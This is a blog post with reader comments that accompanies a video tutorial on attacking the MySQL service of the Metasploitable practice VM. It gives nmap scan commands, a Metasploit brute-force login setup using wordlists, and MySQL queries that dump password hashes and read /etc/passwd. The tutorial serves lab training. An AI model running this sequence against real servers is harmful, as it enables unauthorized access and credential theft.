Watch video on-line: http://g0tmi1k.blip.tv/file/3826084
Download video: http://www.mediafire.com/?cyz2gr42p49rkzm
Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw
What is this?
This video demonstrates an attack on the MySQL database service on the metasploitable hackable box.
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com
Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the login (gaining access)
> By using MySQL client we are able to send commands to the database (Discover password hashes and reading files)
What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> MySQL --- on Backtrack 4 (Final)
> Dictionaries/Word-lists --- Usernames Passwords
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
Commands:
nmap 192.168.1.1-255
nmap -sS -sV -O -f -n 192.168.1.105
msfconsole
search mysql
use scanner/mysql/mysql_login
show options
set RHOSTS 192.168.1.105
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password, from user;
select load_file('/etc/passwd');Notes:
Song: Roberto Sol and Chris le Blanc; Ines - Sueno Damor
Video length: 3:24
Capture length: 9:14
Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-mysql.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30076-%5Bvideo%5D-metasploitable-mysql.html#post167040
~g0tmi1k
how do you know if a web uses mysql _
ReplyDelete@p0rr0n
ReplyDeleteIn the video, at 00:35 - you can see the a open mysql port...(this was discovered by doing a nmap scan)
Again in the video, at 01:15 - it shows this in more detail...(also by using nmap)
@p0rr0n
ReplyDeleteI had to delete your last comment, due to it not being legal.
When i run the last command it shows the a box like below and I typed the command like you did. My passwd file has near identical information as yours does.
ReplyDeleteAny ideas? im running BT4 R2
+--------------------------+
| load_file('/etc/passwd') |
+--------------------------+
| NULL |
+--------------------------+
1 row in set (0.00 sec)
@Krptodr
ReplyDeleteAre you targeting metasploitable?
My first guess it that the user you exploit doesn't have access to the file, hence its returning NULL - which is why I ask about metasploitable...
That makes sense, I dont know if I am targeting Measploitable, I used the commands you have provided. In which case you are using metasploitable-- if im not mistaking.
ReplyDelete@Krptodr
ReplyDeleteYou would know if you're targeting metasploitable as you would have to set it up yourself! (Either by running it on another PC or in VM)...
Your not mistaken, the tutorial is on metasploitable...
Ok correct, I have targeted metasploitable. But for some reason I can not get it to import my files. I will test it again and see if maybe I missed a step. I dont see how I would have because I was able to get to the end :)
ReplyDeleteThis comment has been removed by a blog administrator.
ReplyDelete@Krptodr
ReplyDeleteCheck the MD5 of your copy of metasploitable - see if they match up on what it says on the site.
I seams like a odd issue to me!
@Ilies
I've removed your comment - simple because its off topic. If your wanting general help with metasploit - you can try asking for help either on there IRC channel or mailing list.
This is a post regarding "attacking metasploitable", using linux - not how to hack a web site using windows.